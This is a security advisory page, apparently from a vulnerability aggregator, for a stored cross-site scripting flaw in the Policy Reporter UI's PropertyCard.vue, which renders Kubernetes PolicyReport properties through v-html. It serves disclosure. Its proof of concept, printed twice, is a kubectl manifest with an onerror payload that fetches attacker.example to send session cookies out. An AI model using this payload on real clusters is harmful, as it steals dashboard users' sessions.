Kubernetes
CVE-2026-44245
MEDIUM
Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
1DescriptionGitHub Advisory
Summary
Vue 3's v-html directive is the framework-documented mechanism for injecting raw HTML, and it intentionally disables the auto-escaping that {{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., <img src=x onerror=alert(1)> padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink.
This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1.
PoC
Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access)
Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser.
kubectl apply -f - <<'EOF'
apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2)
kind: PolicyReport
metadata:
name: xss-poc
namespace: default
results:
- message: "test"
policy: xss-test-policy
rule: check-rule
result: fail
properties:
# Value > 75 chars and not an http/https URL -> routed to v-html sink
advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding"
EOF
# Once a UI user opens the results table for the 'default' namespace
# and expands the 'xss-test-policy' result row, the onerror handler fires
# and exfiltrates their session cookies to attacker.example<img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" />
Impact
XSS
Analysis
Summary
Vue 3's v-html directive is the framework-documented mechanism for injecting raw HTML, and it intentionally disables the auto-escaping that {{ }} interpolation provides. The PropertyCard.vue component uses v-html for the else branch of the URL check, meaning any non-URL string value flows directly into the DOM as HTML. The isURL() guard only filters values that parse as http: or https: URLs, so any HTML payload not starting with those schemes (e.g., <img src=x onerror=alert(1)> padded to exceed 75 chars) bypasses it entirely. The data originates from Kubernetes PolicyReport .results[].properties fields, which are arbitrary string maps populated by policy engines and potentially by any principal with write access to PolicyReport objects in the cluster. No DOMPurify or equivalent HTML sanitization library is present anywhere in the frontend codebase, confirming there is no compensating control between the API response and the sink.
This vulnerability was reproduced on the latest policy reporter UI version - 2.5.1.
PoC
Prerequisites: Kubernetes write access to PolicyReport resources in the target cluster (e.g., via a policy engine service account or direct kubectl access)
Create a Kubernetes PolicyReport resource with a crafted property value longer than 75 characters. When an authenticated Policy Reporter UI user browses to the affected namespace and expands the result row containing this property, the injected script executes in their browser.
kubectl apply -f - <<'EOF'
apiVersion: [wgpolicyk8s.io/v1alpha2](http://wgpolicyk8s.io/v1alpha2)
kind: PolicyReport
metadata:
name: xss-poc
namespace: default
results:
- message: "test"
policy: xss-test-policy
rule: check-rule
result: fail
properties:
# Value > 75 chars and not an http/https URL -> routed to v-html sink
advisory: "<img src=x onerror=\"fetch('[https://attacker.example/c?c='+document.cookie](https://attacker.example/c?c=%27+document.cookie))\"> padding padding padding"
EOF
# Once a UI user opens the results table for the 'default' namespace
# and expands the 'xss-test-policy' result row, the onerror handler fires
# and exfiltrates their session cookies to attacker.example<img width="1562" height="1061" alt="Снимок экрана - 2026-04-21 в 10 52 17" src="https://github.com/user-attachments/assets/fe542ccb-1662-44cb-802f-7998aa145db7" /> <img width="1041" height="939" alt="Снимок экрана - 2026-04-21 в 10 51 44" src="https://github.com/user-attachments/assets/bc07cf20-aea5-4a90-838f-c428d88a92b7" />
Impact
XSS
More in Kubernetes
View allA critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c
Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne
The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4
Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass
Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem
Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref
String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-q98m-7w8c-w388